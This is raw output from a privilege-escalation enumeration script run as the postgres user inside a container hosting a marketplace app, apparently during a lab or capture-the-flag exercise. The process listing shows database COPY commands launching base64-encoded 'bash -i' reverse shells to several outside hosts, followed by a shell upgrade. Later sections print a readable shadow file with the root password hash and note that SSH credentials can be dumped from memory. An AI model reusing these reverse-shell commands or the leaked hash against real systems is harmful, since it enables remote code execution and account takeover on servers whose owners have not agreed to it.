postgres 2575 0.0 0.1 84392 5512 ? Ss 15:46 0:00 _ postgres:
logical replication launcher
postgres 2582 0.0 0.3 85680 13732 ? Ss 15:46 0:00 _ postgres:
postgres marketusermanager [Link](44728) idle
postgres 201513 0.0 0.4 85652 16808 ? Ss 17:06 0:00 _ postgres:
postgres marketusermanager [Link](51366) COPY
postgres 201514 0.0 0.0 2580 832 ? S 17:06 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMjEuMzIuODUvOTk5OSAwPiYx | base64 -d |
/bin/bash
postgres 201517 0.0 0.0 6936 2964 ? S 17:06 0:00 |
_ /bin/bash
postgres 201518 0.0 0.0 7200 3604 ? S 17:06 0:00 |
_ bash -i
postgres 220171 0.0 0.4 85652 16708 ? Ss 17:17 0:00 _ postgres:
postgres marketusermanager [Link](37906) COPY
postgres 220176 0.0 0.0 2580 852 ? S 17:17 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMjEuMzIuODcvNDQ0NSAwPiYx | base64 -d |
/bin/bash
postgres 220179 0.0 0.0 6936 2804 ? S 17:17 0:00 |
_ /bin/bash
postgres 220180 0.0 0.0 7200 3672 ? S 17:17 0:00 |
_ bash -i
postgres 227027 0.0 0.3 85652 15492 ? Ss 17:19 0:00 _ postgres:
postgres marketusermanager [Link](43766) COPY
postgres 227031 0.0 0.0 2580 832 ? S 17:19 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMjEuMzIuODMvODk4OSAwPiYxIA== | base64 -d |
/bin/bash
postgres 227034 0.0 0.0 6936 2796 ? S 17:19 0:00 |
_ /bin/bash
postgres 227035 0.0 0.0 7200 3408 ? S 17:19 0:00 |
_ bash -i
postgres 348259 0.0 0.0 6936 3384 ? S 17:39 0:00 |
_ /bin/bash
postgres 371627 0.0 0.0 2580 920 ? S 17:46 0:00 |
_ sh
postgres 371644 0.0 0.0 2580 928 ? S 17:46 0:00 |
_ sh -v
postgres 371666 0.0 0.0 2580 908 ? S 17:46 0:00 |
_ /bin/sh
postgres 379796 0.0 0.0 6936 3440 ? S 17:49 0:00 |
_ /bin/bash
postgres 401118 0.0 0.0 2580 924 ? S 18:02 0:00 |
_ /bin/sh
postgres 258413 0.0 0.4 86524 17616 ? Ss 17:26 0:00 _ postgres:
postgres marketusermanager [Link](53706) idle
postgres 362781 0.0 0.4 86524 18020 ? Ss 17:42 0:00 _ postgres:
postgres marketusermanager [Link](44770) idle
postgres 371372 0.0 0.4 85652 17384 ? Ss 17:45 0:00 _ postgres:
postgres marketusermanager [Link](32898) COPY
postgres 371375 0.0 0.0 2580 944 ? S 17:45 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMjEuMTMyLjI5LjEzNy80MzM0IDA+JjE= | base64 -d |
/bin/bash
postgres 371378 0.0 0.0 6936 3368 ? S 17:45 0:00 |
_ /bin/bash
postgres 371379 0.0 0.0 7200 3880 ? S 17:45 0:00 |
_ bash -i
postgres 390391 0.0 0.0 5500 1020 ? S 17:59 0:00 |
_ script -qc /bin/bash /dev/null
postgres 390392 0.0 0.0 2580 908 pts/0 Ss 17:59 0:00 |
_ sh -c /bin/bash
postgres 390393 0.0 0.1 7200 4004 pts/0 S+ 17:59 0:00 |
_ /bin/bash
postgres 386402 0.0 0.4 86524 17928 ? Ss 17:52 0:00 _ postgres:
postgres marketusermanager [Link](57954) idle
postgres 389677 0.0 0.4 85868 18124 ? Ss 17:59 0:00 _ postgres:
postgres marketusermanager [Link](52118) COPY
postgres 389702 0.0 0.0 2580 916 ? S 17:59 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC93d3cueWMtZG9ja2VyLnJ1LzEwMDI1IDA+JjE= | base64 -d |
bash
postgres 389705 0.0 0.0 6936 3360 ? S 17:59 0:00 | _
bash
postgres 389707 0.0 0.0 7200 3816 ? S 17:59 0:00 |
_ bash -i
postgres 391064 0.0 0.4 85712 17580 ? Ss 18:00 0:00 _ postgres:
postgres marketusermanager [Link](53736) COPY
postgres 391065 0.0 0.0 2580 892 ? S 18:00 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMjEuMTMyLjI5LjEzNy80MzM0IDA+JjE= | base64 -d |
/bin/bash
postgres 391068 0.0 0.0 6936 3388 ? S 18:00 0:00 |
_ /bin/bash
postgres 391069 0.0 0.0 7200 3968 ? S 18:00 0:00 |
_ bash -i
postgres 399086 0.0 0.4 85712 17300 ? Ss 18:01 0:00 _ postgres:
postgres marketusermanager [Link](37604) COPY
postgres 399087 0.0 0.0 2580 872 ? S 18:01 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC93d3cueWMtZG9ja2VyLnJ1LzEwMTI3IDA+JjE= | base64 -d |
bash
postgres 399090 0.0 0.0 6936 3364 ? S 18:01 0:00 | _
bash
postgres 399091 0.0 0.0 7200 3908 ? S 18:01 0:00 |
_ bash -i
postgres 400995 0.0 0.4 85712 17508 ? Ss 18:01 0:00 _ postgres:
postgres marketusermanager [Link](46860) COPY
postgres 400996 0.0 0.0 2580 900 ? S 18:01 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMjEuMTMyLjI5LjEzNy80MzM0IDA+JjE= | base64 -d |
/bin/bash
postgres 400999 0.0 0.0 6936 3396 ? S 18:01 0:00 |
_ /bin/bash
postgres 401000 0.0 0.0 7200 3936 ? S 18:01 0:00 |
_ bash -i
postgres 401184 0.0 0.4 86524 17976 ? Ss 18:02 0:00 _ postgres:
postgres marketusermanager [Link](55764) idle
postgres 401293 0.0 0.4 85712 17596 ? Ss 18:02 0:00 _ postgres:
postgres marketusermanager [Link](51498) COPY
postgres 401294 0.0 0.0 2580 900 ? S 18:02 0:00 | _ sh -c
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8yMjEuMTMyLjI5LjEzNy80MzMzIDA+JjE= | base64 -d |
/bin/bash
postgres 401297 0.0 0.0 6936 3416 ? S 18:02 0:00 |
_ /bin/bash
postgres 401298 0.0 0.0 7200 3968 ? S 18:02 0:00 |
_ bash -i
postgres 412534 3.5 0.1 9328 4724 ? S 18:07 0:00 |
_ bash -i
postgres 415469 0.0 0.1 9328 4116 ? S 18:07 0:00 |
_ bash -i
postgres 415470 0.0 0.1 11308 4680 ? R 18:07 0:00 |
| _ ps fauxwww
postgres 415473 0.0 0.0 9328 2772 ? S 18:07 0:00 |
_ bash -i
postgres 412455 0.2 0.4 85536 19676 ? Ss 18:07 0:00 _ postgres:
postgres marketusermanager [Link](33388) idle
postgres 412487 0.2 0.5 85536 20124 ? Ss 18:07 0:00 _ postgres:
postgres marketusermanager [Link](33504) idle
root 2195 0.3 0.1 720584 7352 ? Sl 15:46 0:26
/usr/bin/containerd-shim-runc-v2 -namespace moby -id
54cd89887a2466c6e0d9b9ec57bbb3d585d95989da258009a09e796c575a8348 -address
/run/containerd/[Link]
root 2217 0.0 0.0 4344 1992 ? Ss 15:46 0:00 _ /bin/bash
/marketplace/[Link]
root 2576 0.0 0.1 54004 7400 ? S 15:46 0:00 _ python3
ecommerce/[Link] runserver [Link]:8000
root 2577 70.6 18.8 2846560 748848 ? Sl 15:46 99:29 _
/usr/local/bin/python3 ecommerce/[Link] runserver [Link]:8000
root 2350 0.3 0.1 720520 7060 ? Sl 15:46 0:26
/usr/bin/containerd-shim-runc-v2 -namespace moby -id
23a90ddaa68e65401f0f49a65c6e060c5c5d91169950c4e48c2f2261a3095888 -address
/run/containerd/[Link]
root 2370 0.0 0.0 11392 1144 ? Ss 15:46 0:00 _ nginx: master
process nginx -g daemon[0m off;
101 2437 1.7 0.0 12280 3504 ? S 15:46 2:30 _ nginx:
worker process

╔══════════╣ Processes with credentials in memory (root req)


╚ [Link]
[Link]#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)

╔══════════╣ Processes whose PPID belongs to a different user (not root)


╚ You will know if a user can somehow spawn processes as a different user

╔══════════╣ Files opened by processes belonging to other users


╚ This is usually empty because of the lack of privileges to read other user
processes information

╔══════════╣ Systemd PATH


╚ [Link]
[Link]#systemd-path---relative-paths

╔══════════╣ Cron jobs


╚ [Link]
[Link]#scheduledcron-jobs
crontab Not Found
incrontab Not Found
/etc/[Link]:
total 20
drwxr-xr-x 2 root root 4096 Mar 28 2024 .
drwxr-xr-x 1 root root 4096 Mar 19 14:57 ..
-rwxr-xr-x 1 root root 1478 May 25 2023 apt-compat
-rwxr-xr-x 1 root root 123 Mar 27 2023 dpkg

╔══════════╣ System timers


╚ [Link]
[Link]#timers

╔══════════╣ Analyzing .timer files


╚ [Link]
[Link]#timers

╔══════════╣ Analyzing .service files


╚ [Link]
[Link]#services
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files


╚ [Link]
[Link]#sockets
╔══════════╣ Unix Sockets Listening
╚ [Link]
[Link]#sockets
sed: -e expression #1, char 0: no previous regular expression
/tmp/.[Link].5432
└─(Read Write)

╔══════════╣ D-Bus Service Objects list


╚ [Link]
[Link]#d-bus
busctl Not Found
╔══════════╣ D-Bus config files
╚ [Link]
[Link]#d-bus

╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Interfaces
Inter-| Receive | Transmit
face |bytes packets errs drop fifo frame compressed multicast|bytes packets
errs drop fifo colls carrier compressed
lo: 905575584 1368504 0 0 0 0 0 0 905575584
1368504 0 0 0 0 0 0
eth0: 221555333 1368585 0 0 0 0 0 0 572961585
1111671 0 0 0 0 0 0
Main:
+-- [Link]/1 2 0 2
+-- [Link]/4 2 0 2
|-- [Link]
/0 universe UNICAST
+-- [Link]/16 2 0 2
+-- [Link]/20 2 0 2
|-- [Link]
/16 link UNICAST
|-- [Link]
/32 host LOCAL
|-- [Link]
/32 link BROADCAST
+-- [Link]/8 2 0 2
+-- [Link]/31 1 0 0
|-- [Link]
/8 host LOCAL
|-- [Link]
/32 host LOCAL
|-- [Link]
/32 link BROADCAST
Local:
+-- [Link]/1 2 0 2
+-- [Link]/4 2 0 2
|-- [Link]
/0 universe UNICAST
+-- [Link]/16 2 0 2
+-- [Link]/20 2 0 2
|-- [Link]
/16 link UNICAST
|-- [Link]
/32 host LOCAL
|-- [Link]
/32 link BROADCAST
+-- [Link]/8 2 0 2
+-- [Link]/31 1 0 0
|-- [Link]
/8 host LOCAL
|-- [Link]
/32 host LOCAL
|-- [Link]
/32 link BROADCAST

╔══════════╣ Hostname, hosts and DNS


eec1d86edd7a
[Link] localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
[Link] eec1d86edd7a
search [Link]
nameserver [Link]
options edns0 trust-ad ndots:0

╔══════════╣ Active Ports


╚ [Link]
[Link]#open-ports

╔══════════╣ Can I sniff with tcpdump?


No

╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ [Link]
[Link]#users
uid=1000(postgres) gid=1000(postgres) groups=1000(postgres)

╔══════════╣ Do I have PGP keys?


gpg Not Found
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d


╚ [Link]
[Link]#sudo-and-suid

╔══════════╣ Checking sudo tokens


╚ [Link]
[Link]#reusing-sudo-tokens
ptrace protection is enabled (1)

╔══════════╣ Checking Pkexec policy


╚ [Link]
groups-linux-pe/[Link]#pe---method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console


postgres:x:1000:1000::/home/postgres:/bin/sh
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups


uid=0(root) gid=0(root) groups=0(root)
uid=1000(postgres) gid=1000(postgres) groups=1000(postgres)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=42(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now


18:07:40 up 2:21, 0 user, load average: 1.06, 0.67, 0.91
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

╔══════════╣ Last logons

╔══════════╣ Last time logon each user

╔══════════╣ Do not forget to test 'su' as any other user with shell: without
password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid
password (if you know it)!!

╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/perl

╔══════════╣ Installed Compilers

╔══════════╣ Analyzing PAM Auth Files (limit 70)


drwxr-xr-x 2 root root 4096 Mar 28 2024 /etc/pam.d
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 May 25 2023 /etc/apt/keyrings
drwxr-xr-x 2 root root 4096 Mar 28 2024 /usr/share/keyrings

╔══════════╣ Analyzing Other Interesting Files (limit 70)


-rw-r--r-- 1 root root 3526 Apr 23 2023 /etc/skel/.bashrc

-rw-r--r-- 1 root root 807 Apr 23 2023 /etc/skel/.profile

╔══════════╣ Analyzing PGP-GPG Files (limit 70)


gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 8700 Jul 30 2023 /usr/share/keyrings/debian-archive-


[Link]
-rw-r--r-- 1 root root 8709 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 280 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 8700 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 8709 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 2453 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 8132 Jul 30 2023 /usr/share/keyrings/debian-archive-buster-
[Link]
-rw-r--r-- 1 root root 8141 Jul 30 2023 /usr/share/keyrings/debian-archive-buster-
[Link]
-rw-r--r-- 1 root root 2332 Jul 30 2023 /usr/share/keyrings/debian-archive-buster-
[Link]
-rw-r--r-- 1 root root 56156 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]
-rw-r--r-- 1 root root 54031 Jul 30 2023 /usr/share/keyrings/debian-archive-
[Link]

╔══════════╣ Analyzing PostgreSQL Files (limit 70)


Version: psql (PostgreSQL) 14.12

-rw-r--r-- 1 root root 213 Jun 11 2024


/opt/bitnami/postgresql/[Link]/pg_hba.conf
local all all trust
host all all [Link]/32 trust
host all all ::1/128 trust
-rw-rw-r-- 1 root root 345 Mar 19 14:57 /opt/bitnami/postgresql/conf/pg_hba.conf
host all all [Link]/0 md5
host all all ::/0 md5
local all all md5
host all all [Link]/32 md5
host all all ::1/128 md5

-rw-r--r-- 1 root root 28731 Jun 11 2024


/opt/bitnami/postgresql/[Link]/[Link]
include_dir = 'conf.d'
-rw-rw-r-- 1 root root 28447 Mar 19 14:57
/opt/bitnami/postgresql/conf/[Link]
listen_addresses = '*'
port = '5432'
wal_level = 'replica'
fsync = 'on'
max_wal_size = '400MB'
max_wal_senders = '16'
wal_keep_size = '128MB'
hot_standby = 'on'
client_min_messages = 'error'
shared_preload_libraries = 'pgaudit'
include_dir = 'conf.d'
[Link] = 'all,-misc'

═╣ PostgreSQL connection to template0 using postgres/NOPASS ........ No


═╣ PostgreSQL connection to template1 using postgres/NOPASS ........ No
═╣ PostgreSQL connection to template0 using pgsql/NOPASS ........... No
═╣ PostgreSQL connection to template1 using pgsql/NOPASS ........... No

╔══════════╣ Searching uncommon passwd files (splunk)


passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files


══╣ Some certificates were found (out limited):
/etc/ssl/certs/[Link]
/etc/ssl/certs/AC_RAIZ_FNMT-[Link]
/etc/ssl/certs/AC_RAIZ_FNMT-RCM_SERVIDORES_SEGUROS.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/ANF_Secure_Server_Root_CA.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068_2.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/[Link]
412534PSTORAGE_CERTSBIN
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ [Link]
[Link]#sudo-and-suid
strings Not Found
strace Not Found
ls: cannot access '': No such file or directory
(Unknown SUID binary!)

╔══════════╣ SGID
╚ [Link]
[Link]#sudo-and-suid
ls: cannot access '': No such file or directory
(Unknown SGID binary)

╔══════════╣ Files with ACLs (limited to 50)


╚ [Link]
[Link]#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ [Link]
[Link]#capabilities
══╣ Current shell capabilities
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80c25db
CapAmb: 0000000000000000

══╣ Parent proc capabilities


CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80c25db
CapAmb: 0000000000000000

Files with capabilities (limited to 50):

╔══════════╣ Checking misconfigurations of [Link]


╚ [Link]
[Link]#ldso
/etc/[Link]
Content of /etc/[Link]:
include /etc/[Link].d/*.conf

/etc/[Link].d
/etc/[Link].d/[Link]
- /usr/local/lib
/etc/[Link].d/x86_64-[Link]
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu

/etc/[Link]
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ [Link]
[Link]#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Jan 28 2024 .
drwxr-xr-x 1 root root 4096 Mar 19 14:57 ..

╔══════════╣ Permissions in init, init.d, systemd, and rc.d


╚ [Link]
[Link]#init-initd-systemd-and-rcd

═╣ Hashes inside passwd file? ........... No


═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. root:
$1$xyz$R7n0ak3ptkexFwuStJOw9/:19579:0:99999:7:::
daemon:*:17885:0:99999:7:::
bin:*:17885:0:99999:7:::
sys:*:17885:0:99999:7:::
sync:*:17885:0:99999:7:::
games:*:17885:0:99999:7:::
man:*:17885:0:99999:7:::
lp:*:17885:0:99999:7:::
mail:*:17885:0:99999:7:::
news:*:17885:0:99999:7:::
uucp:*:17885:0:99999:7:::
proxy:*:17885:0:99999:7:::
www-data:*:17885:0:99999:7:::
backup:*:17885:0:99999:7:::
list:*:17885:0:99999:7:::
irc:*:17885:0:99999:7:::
gnats:*:17885:0:99999:7:::
nobody:*:17885:0:99999:7:::
_apt:*:17885:0:99999:7:::
postgres:!:20166:0:99999:7:::
root:$1$xyz$R7n0ak3ptkexFwuStJOw9/:19579:0:99999:7:::
daemon:*:17885:0:99999:7:::
bin:*:17885:0:99999:7:::
sys:*:17885:0:99999:7:::
sync:*:17885:0:99999:7:::
games:*:17885:0:99999:7:::
man:*:17885:0:99999:7:::
lp:*:17885:0:99999:7:::
mail:*:17885:0:99999:7:::
news:*:17885:0:99999:7:::
uucp:*:17885:0:99999:7:::
proxy:*:17885:0:99999:7:::
www-data:*:17885:0:99999:7:::
backup:*:17885:0:99999:7:::
list:*:17885:0:99999:7:::
irc:*:17885:0:99999:7:::
gnats:*:17885:0:99999:7:::
nobody:*:17885:0:99999:7:::
_apt:*:17885:0:99999:7:::
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)


/home/
/home/rceflag
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit


100)
-rw-r--r-- 1 root root 0 Mar 19 14:57 /opt/bitnami/postgresql/tmp/.initialized

╔══════════╣ Readable files belonging to root and readable by me but not world
readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in


Home) (max 200)
╚ [Link]
[Link]#writable-files
/bitnami/postgresql/data
/bitnami/postgresql/data/base
/bitnami/postgresql/data/base/1
/bitnami/postgresql/data/base/1/112
/bitnami/postgresql/data/base/1/113
/bitnami/postgresql/data/base/1/1247
/bitnami/postgresql/data/base/1/1247_fsm
/bitnami/postgresql/data/base/1/1247_vm
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/base/13779
/bitnami/postgresql/data/base/13779/112
/bitnami/postgresql/data/base/13779/113
/bitnami/postgresql/data/base/13779/1247
/bitnami/postgresql/data/base/13779/1247_fsm
/bitnami/postgresql/data/base/13779/1247_vm
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/base/13780
/bitnami/postgresql/data/base/13780/112
/bitnami/postgresql/data/base/13780/113
/bitnami/postgresql/data/base/13780/1247
/bitnami/postgresql/data/base/13780/1247_fsm
/bitnami/postgresql/data/base/13780/1247_vm
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/base/1/3997
/bitnami/postgresql/data/base/1/4143
/bitnami/postgresql/data/base/1/4144
/bitnami/postgresql/data/base/1/4145
/bitnami/postgresql/data/base/1/4146
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/base/16384
/bitnami/postgresql/data/base/16384/112
/bitnami/postgresql/data/base/16384/113
/bitnami/postgresql/data/base/16384/1247
/bitnami/postgresql/data/base/16384/1247_fsm
/bitnami/postgresql/data/base/16384/1247_vm
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/base/1/826
/bitnami/postgresql/data/base/1/827
/bitnami/postgresql/data/base/1/828
/bitnami/postgresql/data/base/1/pg_filenode.map
/bitnami/postgresql/data/base/1/PG_VERSION
/bitnami/postgresql/data/base/out
/bitnami/postgresql/data/base/pgsql_tmp
/bitnami/postgresql/data/base/[Link]
/bitnami/postgresql/data/global
/bitnami/postgresql/data/global/1213
/bitnami/postgresql/data/global/1213_fsm
/bitnami/postgresql/data/global/1213_vm
/bitnami/postgresql/data/global/1214
/bitnami/postgresql/data/global/1214_fsm
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/pg_commit_ts
/bitnami/postgresql/data/pg_dynshmem
/bitnami/postgresql/data/pg_ident.conf
/bitnami/postgresql/data/pg_logical
/bitnami/postgresql/data/pg_logical/mappings
/bitnami/postgresql/data/pg_logical/replorigin_checkpoint
/bitnami/postgresql/data/pg_logical/snapshots
/bitnami/postgresql/data/pg_multixact
/bitnami/postgresql/data/pg_multixact/members
/bitnami/postgresql/data/pg_multixact/members/0000
/bitnami/postgresql/data/pg_multixact/offsets
/bitnami/postgresql/data/pg_multixact/offsets/0000
/bitnami/postgresql/data/pg_notify
/bitnami/postgresql/data/pg_replslot
/bitnami/postgresql/data/pg_serial
/bitnami/postgresql/data/pg_snapshots
/bitnami/postgresql/data/pg_stat
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/pg_stat_tmp/db_0.stat
/bitnami/postgresql/data/pg_stat_tmp/db_13780.stat
/bitnami/postgresql/data/pg_stat_tmp/db_16384.stat
/bitnami/postgresql/data/pg_stat_tmp/[Link]
/bitnami/postgresql/data/pg_subtrans
/bitnami/postgresql/data/pg_subtrans/0000
/bitnami/postgresql/data/pg_tblspc
/bitnami/postgresql/data/pg_twophase
/bitnami/postgresql/data/PG_VERSION
/bitnami/postgresql/data/pg_wal
/bitnami/postgresql/data/pg_wal/000000010000000000000001
/bitnami/postgresql/data/pg_wal/000000010000000000000002
/bitnami/postgresql/data/pg_wal/000000010000000000000003
/bitnami/postgresql/data/pg_wal/000000010000000000000004
/bitnami/postgresql/data/pg_wal/000000010000000000000005
#)You_can_write_even_more_files_inside_last_directory

/bitnami/postgresql/data/pg_xact
/bitnami/postgresql/data/pg_xact/0000
/bitnami/postgresql/data/[Link]
/bitnami/postgresql/data/[Link]
/bitnami/postgresql/data/[Link]
/dev/mqueue
/dev/shm
/dev/shm/PostgreSQL.3792376722
/opt/bitnami/postgresql/logs
/opt/bitnami/postgresql/tmp
/opt/bitnami/postgresql/tmp/[Link]
/run/lock
/tmp
/tmp/[Link]
/tmp/[Link]
/tmp/.[Link]
/tmp/[Link]
/tmp/[Link]
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)


╚ [Link]
[Link]#writable-files
Group postgres:
/opt/bitnami/postgresql/logs
/opt/bitnami/postgresql/tmp

╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ [Link]
[Link]#scriptbinaries-in-path

╔══════════╣ Executable files potentially added by user (limit 70)


2025-04-02+18:04:34.0220439960 /bitnami/postgresql/data/base/[Link]
2025-04-02+18:00:49.4834983220 /tmp/[Link]
2025-04-02+17:57:39.9253257730 /tmp/[Link]
2025-04-02+17:51:37.7612886970 /tmp/[Link]
2025-04-02+17:50:07.4762623290 /tmp/[Link]
2025-03-19+14:57:54.5319045810 /.dockerenv

╔══════════╣ Unexpected in /opt (usually empty)


total 20
drwxrwxr-x 1 root root 4096 Jun 11 2024 .
drwxr-xr-x 1 root root 4096 Mar 19 14:57 ..
drwxrwxr-x 1 root root 4096 Jun 11 2024 bitnami

╔══════════╣ Unexpected in root


/docker-entrypoint-initdb.d
/bitnami
/docker-entrypoint-preinitdb.d
/.dockerenv

╔══════════╣ Modified interesting files in the last 5mins (limit 100)


/home/rceflag
/bitnami/postgresql/data/base/[Link]
/bitnami/postgresql/data/base/16384/16565
/bitnami/postgresql/data/base/16384/16572
/bitnami/postgresql/data/base/16384/16508
/bitnami/postgresql/data/base/16384/2619_fsm
/bitnami/postgresql/data/base/16384/16518
/bitnami/postgresql/data/base/16384/16522
/bitnami/postgresql/data/base/16384/16414
/bitnami/postgresql/data/base/16384/16569
/bitnami/postgresql/data/base/16384/16431_fsm
/bitnami/postgresql/data/base/16384/16445
/bitnami/postgresql/data/base/16384/16564
/bitnami/postgresql/data/base/16384/16425
/bitnami/postgresql/data/base/16384/16570
/bitnami/postgresql/data/base/16384/2840_fsm
/bitnami/postgresql/data/base/16384/16520
/bitnami/postgresql/data/base/16384/16459
/bitnami/postgresql/data/base/16384/2696
/bitnami/postgresql/data/base/16384/2841
/bitnami/postgresql/data/base/16384/16425_fsm
/bitnami/postgresql/data/base/16384/16430
/bitnami/postgresql/data/base/16384/16431
/bitnami/postgresql/data/base/16384/2619
/bitnami/postgresql/data/base/16384/16571
/bitnami/postgresql/data/base/16384/16414_fsm
/bitnami/postgresql/data/base/16384/16528
/bitnami/postgresql/data/base/16384/2840
/bitnami/postgresql/data/base/16384/1259
/bitnami/postgresql/data/base/16384/16436
/bitnami/postgresql/data/base/out
/bitnami/postgresql/data/pg_multixact/offsets/0000
/bitnami/postgresql/data/pg_multixact/members/0000
/bitnami/postgresql/data/global/pg_control
/bitnami/postgresql/data/pg_logical/replorigin_checkpoint
/bitnami/postgresql/data/pg_wal/000000010000000000000007
/bitnami/postgresql/data/pg_subtrans/0000
/bitnami/postgresql/data/pg_xact/0000
/bitnami/postgresql/data/pg_stat_tmp/db_13780.stat
/bitnami/postgresql/data/pg_stat_tmp/db_0.stat
/bitnami/postgresql/data/pg_stat_tmp/db_16384.stat
/bitnami/postgresql/data/pg_stat_tmp/[Link]
/tmp/.[Link]

╔══════════╣ Files inside / (limit 20)


total 76
drwxr-xr-x 1 root root 4096 Mar 19 14:57 .
drwxr-xr-x 1 root root 4096 Mar 19 14:57 ..
lrwxrwxrwx 1 root root 7 Mar 28 2024 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jun 11 2024 bitnami
drwxr-xr-x 2 root root 4096 Jan 28 2024 boot
drwxr-xr-x 5 root root 340 Mar 19 14:57 dev
drwxrwxr-x 2 root root 4096 Mar 19 14:57 docker-entrypoint-initdb.d
drwxr-xr-x 2 root root 4096 Mar 19 14:57 docker-entrypoint-preinitdb.d
